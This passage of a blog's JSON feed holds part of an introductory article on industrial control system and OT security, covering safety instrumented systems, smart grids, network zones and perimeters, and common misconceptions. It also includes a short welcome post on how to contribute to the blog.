Characteristics:</strong></p>\n<ul>\n<li class=\"\"><strong>Independence</strong>: SIS operates independently from the main control system; if main DCS/SCADA fails, SIS continues to protect.</li>\n<li class=\"\"><strong>Deterministic Response</strong>: SIS must respond to detected hazards within a specified time; performance cannot degrade.</li>\n<li class=\"\"><strong>Redundancy</strong>: Critical SIS functions use redundant sensors, logic solvers, and actuators to eliminate single points of failure.</li>\n<li class=\"\"><strong>Fail-Safe Logic</strong>: In case of system failure, SIS defaults to the safe state (e.g., close emergency shutdown valve, stop pump, raise alarm).</li>\n<li class=\"\"><strong>Validation &amp; Certification</strong>: SIS is designed, tested, and certified to safety integrity level (SIL) standards (SIL 1-4, where SIL 4 is highest safety criticality).</li>\n</ul>\n<p><strong>Common SIS Applications:</strong></p>\n<ul>\n<li class=\"\">Emergency shutdown (ESD) systems in oil/gas processing.</li>\n<li class=\"\">Pressure relief systems (Pressure Safety Valves - PSVs).</li>\n<li class=\"\">Temperature or flow alarms triggering automatic shutdowns.</li>\n<li class=\"\">Fire detection and suppression systems.</li>\n<li class=\"\">Personnel safety systems (interlocks preventing operator access to hazardous zones).</li>\n</ul>\n<div class=\"diagram-container\">\n<figure>\n<img decoding=\"async\" loading=\"lazy\" class=\"diagram-img img_ev3q\" src=\"https://www.methodfs.com/images/pages/ls-lop.png\" alt=\"Safety Instrumented System (SIS) logic solver and safety shutdown\">\n<figcaption class=\"diagram-caption\"><strong>Fig 1.11:</strong> Safety Instrumented System showing independent logic solver and shutdown mechanisms for fail-safe protection of critical processes.</figcaption>\n</figure>\n</div>\n<blockquote>\n<p><strong>Why SIS is Critical:</strong><br>\nMain control systems can fail or be compromised. SIS exists as a final, independent layer of protection to prevent catastrophic events—explosions, toxic releases, loss of life. It's not optional; it's mandated by safety standards in high-risk industries.</p>\n</blockquote>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"110-smart-grid\">1.10 Smart Grid<a href=\"https://haxnation.github.io/blog/introduction-to-ics-ot-security#110-smart-grid\" class=\"hash-link\" aria-label=\"Direct link to 1.10 Smart Grid\" title=\"Direct link to 1.10 Smart Grid\" translate=\"no\">​</a></h3>\n<p><strong>Smart Grid</strong> is <mark>a modernized, digitally integrated electrical grid that uses advanced sensors, communication networks, and automation to optimize the generation, distribution, and consumption of electricity in real-time.</mark></p>\n<p><strong>Components:</strong></p>\n<ul>\n<li class=\"\"><strong>Advanced Metering Infrastructure (AMI)</strong>: Smart meters that record energy consumption at granular intervals (e.g., every 15 minutes) and communicate wirelessly to utilities.</li>\n<li class=\"\"><strong>Phasor Measurement Units (PMUs)</strong>: High-speed sensors that capture grid voltage, current, and frequency 30+ times per second for real-time grid health monitoring.</li>\n<li class=\"\"><strong>Distributed Energy Resources (DERs)</strong>: Renewable energy sources (solar, wind), battery storage, and microgrids connected to the grid.</li>\n<li class=\"\"><strong>Demand Response Systems</strong>: IoT-enabled devices and systems that can adjust consumption (e.g., reduce air conditioning during peak demand) based on grid signals.</li>\n<li class=\"\"><strong>Communication Networks</strong>: Fiber optics, cellular, and wireless mesh networks enabling bidirectional communication between grid components and control centers.</li>\n<li class=\"\"><strong>Grid-Level Automation</strong>: SCADA and advanced control systems that optimize power flow, prevent blackouts, and balance supply/demand.</li>\n</ul>\n<div class=\"diagram-container\">\n<figure>\n<img decoding=\"async\" loading=\"lazy\" class=\"diagram-img img_ev3q\" src=\"https://i0.wp.com/semiengineering.com/wp-content/uploads/2015/06/con-edison.jpg\" alt=\"Smart Grid infrastructure and distribution network\">\n<figcaption class=\"diagram-caption\"><strong>Fig 1.12:</strong> Smart Grid infrastructure showing modernized electrical distribution with sensors, automation, and bidirectional communication for optimized power management.</figcaption>\n</figure>\n</div>\n<p><strong>Benefits:</strong></p>\n<ul>\n<li class=\"\"><strong>Efficiency</strong>: Reduces energy losses in transmission and distribution.</li>\n<li class=\"\"><strong>Reliability</strong>: Faster detection and isolation of faults; reduced outage duration.</li>\n<li class=\"\"><strong>Sustainability</strong>: Integrates renewable energy; supports electric vehicle charging infrastructure.</li>\n<li class=\"\"><strong>Demand-Side Management</strong>: Consumers get real-time visibility into consumption; utilities can optimize load balancing.</li>\n<li class=\"\"><strong>Resilience</strong>: Decentralized architecture and redundancy make grids more resistant to failures and cyberattacks.</li>\n</ul>\n<blockquote>\n<p><strong>Why Smart Grid Matters:</strong><br>\nTraditional electrical grids are centralized, reactive (responding after faults occur), and inflexible. Smart grids are distributed, predictive (detecting issues before they escalate), and adaptive. As renewable energy, electrification of transport, and climate concerns intensify, smart grids are essential to meeting future energy demands safely and sustainably.</p>\n</blockquote>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"2-industrial-network-fundamentals\">2. Industrial Network Fundamentals<a href=\"https://haxnation.github.io/blog/introduction-to-ics-ot-security#2-industrial-network-fundamentals\" class=\"hash-link\" aria-label=\"Direct link to 2. Industrial Network Fundamentals\" title=\"Direct link to 2. Industrial Network Fundamentals\" translate=\"no\">​</a></h2>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"21-routable-and-nonroutable-networks\">2.1 Routable and Nonroutable Networks<a href=\"https://haxnation.github.io/blog/introduction-to-ics-ot-security#21-routable-and-nonroutable-networks\" class=\"hash-link\" aria-label=\"Direct link to 2.1 Routable and Nonroutable Networks\" title=\"Direct link to 2.1 Routable and Nonroutable Networks\" translate=\"no\">​</a></h3>\n<p><strong>Routable Networks:</strong></p>\n<ul>\n<li class=\"\"><mark>Networks that use protocols like TCP/IP and can communicate across multiple network segments via routers and gateways.</mark></li>\n<li class=\"\">Enable direct communication between distant systems and remote monitoring/control capabilities.</li>\n<li class=\"\">More flexible but introduce higher attack surface as they connect to enterprise IT networks and potentially the internet.</li>\n<li class=\"\">Example: Modern SCADA systems using industrial Ethernet over TCP/IP.</li>\n</ul>\n<p><strong>Nonroutable Networks:</strong></p>\n<ul>\n<li class=\"\"><mark>Networks that use proprietary protocols (e.g., serial communications, Modbus, Profibus) and do not support standard IP routing.</mark></li>\n<li class=\"\">Historically isolated by nature; cannot directly communicate across network boundaries without protocol conversion.</li>\n<li class=\"\">Simpler architecture and lower complexity, but limited remote capabilities.</li>\n<li class=\"\">Example: Legacy PLCs communicating via RS-485 serial lines or Profibus networks.</li>\n</ul>\n<hr>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"22-zones-and-enclaves\">2.2 Zones and Enclaves<a href=\"https://haxnation.github.io/blog/introduction-to-ics-ot-security#22-zones-and-enclaves\" class=\"hash-link\" aria-label=\"Direct link to 2.2 Zones and Enclaves\" title=\"Direct link to 2.2 Zones and Enclaves\" translate=\"no\">​</a></h3>\n<p><strong>Security Zones:</strong></p>\n<ul>\n<li class=\"\"><mark>Logical or physical groupings of ICS components with similar trust levels and security requirements, separated from other zones by controlled access points.</mark></li>\n<li class=\"\">Help enforce the principle of least privilege and compartmentalize risk.</li>\n<li class=\"\">Example zones: Field Device Zone, Control Zone, Supervisory Zone, Enterprise Zone.</li>\n<li class=\"\">Zones allow organizations to apply different security policies based on criticality and sensitivity.</li>\n</ul>\n<p><strong>Enclaves:</strong></p>\n<ul>\n<li class=\"\"><mark>Self-contained network segments within a zone or spanning multiple zones, designed to isolate mission-critical or sensitive operations.</mark></li>\n<li class=\"\">Typically protected by firewalls, network segmentation, and access control lists (ACLs).</li>\n<li class=\"\">Enable defense-in-depth by reducing lateral movement if one segment is compromised.</li>\n<li class=\"\">Example: A power generation enclave within a utility's broader SCADA network.</li>\n</ul>\n<hr>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"23-network-perimeters-and-electrical-security-perimeters-esp\">2.3 Network Perimeters and Electrical Security Perimeters (ESP)<a href=\"https://haxnation.github.io/blog/introduction-to-ics-ot-security#23-network-perimeters-and-electrical-security-perimeters-esp\" class=\"hash-link\" aria-label=\"Direct link to 2.3 Network Perimeters and Electrical Security Perimeters (ESP)\" title=\"Direct link to 2.3 Network Perimeters and Electrical Security Perimeters (ESP)\" translate=\"no\">​</a></h3>\n<p><strong>Network Perimeters:</strong></p>\n<ul>\n<li class=\"\"><mark>The boundary or demarcation line between one security zone and another, or between the ICS and external networks (enterprise IT, internet).</mark></li>\n<li class=\"\">Controlled through firewalls, gateways, and monitoring points.</li>\n<li class=\"\">All traffic crossing perimeters should be inspected, authenticated, and logged.</li>\n<li class=\"\">Critical for preventing unauthorized access and lateral spread of threats.</li>\n</ul>\n<p><strong>Electrical Security Perimeters (ESP):</strong></p>\n<ul>\n<li class=\"\"><mark>The conceptual or physical boundary that defines which devices and systems are critical to the safe and reliable operation of industrial processes.</mark></li>\n<li class=\"\">Defined by NERC CIP standards for the power industry.</li>\n<li class=\"\">All access points (physical and logical) to the ESP must be monitored and controlled.</li>\n<li class=\"\">Systems outside the ESP have fewer security requirements but may still impact overall security posture.</li>\n<li class=\"\">Example: A power plant's control center, servers, and critical field devices form the ESP, while administrative offices may fall outside.</li>\n</ul>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"3-common-misperceptions-about-industrial-network-security\">3. Common Misperceptions About Industrial Network Security<a href=\"https://haxnation.github.io/blog/introduction-to-ics-ot-security#3-common-misperceptions-about-industrial-network-security\" class=\"hash-link\" aria-label=\"Direct link to 3. Common Misperceptions About Industrial Network Security\" title=\"Direct link to 3. Common Misperceptions About Industrial Network Security\" translate=\"no\">​</a></h2>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"31-air-gaps-are-completely-secure\">3.1 Air Gaps are Completely Secure<a href=\"https://haxnation.github.io/blog/introduction-to-ics-ot-security#31-air-gaps-are-completely-secure\" class=\"hash-link\" aria-label=\"Direct link to 3.1 Air Gaps are Completely Secure\" title=\"Direct link to 3.1 Air Gaps are Completely Secure\" translate=\"no\">​</a></h3>\n<p><strong>Reality:</strong> USB devices, wireless access, and contractors can bypass air gaps. Physical separation helps but isn't a complete security strategy.</p>\n<hr>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"32-security-is-impossible-in-control-environments\">3.2 Security is Impossible in Control Environments<a href=\"https://haxnation.github.io/blog/introduction-to-ics-ot-security#32-security-is-impossible-in-control-environments\" class=\"hash-link\" aria-label=\"Direct link to 3.2 Security is Impossible in Control Environments\" title=\"Direct link to 3.2 Security is Impossible in Control Environments\" translate=\"no\">​</a></h3>\n<p><strong>Reality:</strong> Compensating controls (segmentation, firewalls, monitoring) can provide strong security without traditional patching. Defense-in-depth works in ICS.</p>\n<hr>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"33-security-is-its-responsibility\">3.3 Security is IT's Responsibility<a href=\"https://haxnation.github.io/blog/introduction-to-ics-ot-security#33-security-is-its-responsibility\" class=\"hash-link\" aria-label=\"Direct link to 3.3 Security is IT's Responsibility\" title=\"Direct link to 3.3 Security is IT's Responsibility\" translate=\"no\">​</a></h3>\n<p><strong>Reality:</strong> Both IT and operations must collaborate. Operations understands risk tolerance and process constraints; IT provides technical tools.</p>\n<hr>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"34-enterprise-security-tools-work-for-ics\">3.4 Enterprise Security Tools Work for ICS<a href=\"https://haxnation.github.io/blog/introduction-to-ics-ot-security#34-enterprise-security-tools-work-for-ics\" class=\"hash-link\" aria-label=\"Direct link to 3.4 Enterprise Security Tools Work for ICS\" title=\"Direct link to 3.4 Enterprise Security Tools Work for ICS\" translate=\"no\">​</a></h3>\n<p><strong>Reality:</strong> Enterprise tools often cause unacceptable latency or fail on industrial protocols. ICS requires purpose-built solutions respecting <mark>Availability &gt; Confidentiality</mark> priority.</p>\n<hr>\n<blockquote>\n<p><strong>Key Takeaway:</strong> Industrial security is distinct from enterprise security. Success requires collaboration, acknowledgment of constraints, and purpose-built solutions.</p>\n</blockquote>",
            "url": "https://haxnation.github.io/blog/introduction-to-ics-ot-security",
            "title": "Introduction to ICS/OT Security",
            "summary": "An introduction to Industrial Control Systems (ICS) and Operational Technology (OT) security, covering fundamental concepts, differences between IT and OT environments, and why industrial cybersecurity matters.\n",
            "date_modified": "2026-05-25T08:00:00.000Z",
            "author": {
                "name": "Param Jasani",
                "url": "https://github.com/param-jasani"
            },
            "tags": [
                "ICS",
                "OT",
                "SCADA",
                "DCS",
                "industrial-security",
                "critical-infrastructure"
            ]
        },
        {
            "id": "https://haxnation.github.io/blog/welcome-to-Haxnation-blog",
            "content_html": "<p>We're thrilled to launch the <strong>Haxnation community blog</strong> — a space for insights, research, tutorials, and stories from our growing community.</p>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"how-to-contribute\">How to Contribute<a href=\"https://haxnation.github.io/blog/welcome-to-Haxnation-blog#how-to-contribute\" class=\"hash-link\" aria-label=\"Direct link to How to Contribute\" title=\"Direct link to How to Contribute\" translate=\"no\">​</a></h2>\n<p>Every blog post goes through a review process to maintain quality and security. Here's the flow:</p>\n<ol>\n<li class=\"\"><strong>Fork</strong> this repository</li>\n<li class=\"\">Create your post under <code>blog/&lt;your-github-username&gt;/</code></li>\n<li class=\"\">Submit a <strong>Pull Request</strong> to <code>main</code></li>\n<li class=\"\">Our automated checks run (authorization + content isolation)</li>\n<li class=\"\">A blog-reviewer approves and merges your post</li>\n</ol>\n<p>Check out the <a href=\"https://github.com/haxnation/blog/blob/main/CONTRIBUTING.md\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">Contributing Guide</a> for full details.</p>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"stay-connected\">Stay Connected<a href=\"https://haxnation.github.io/blog/welcome-to-Haxnation-blog#stay-connected\" class=\"hash-link\" aria-label=\"Direct link to Stay Connected\" title=\"Direct link to Stay Connected\" translate=\"no\">​</a></h2>\n<p>Follow along at <a href=\"https://haxnation.org/\" target=\"_blank\" rel=\"noopener noreferrer\" class=\"\">Haxnation.org</a>.</p>\n<hr>\n<p><em>Happy hacking</em> ⚡</p>",
            "url": "https://haxnation.github.io/blog/welcome-to-Haxnation-blog",
            "title": "Welcome to the Haxnation Blog",
            "summary": "The official Haxnation community blog is live! Learn about what we'll be writing about and how you can contribute your own posts.\n",
            "date_modified": "2026-05-23T12:00:00.000Z",
            "author": {
                "name": "Haxnation",
                "url": "https://github.com/haxnation"
            },
            "tags": [
                "announcement",
                "Haxnation",
                "community"
            ]
        }
    ]
}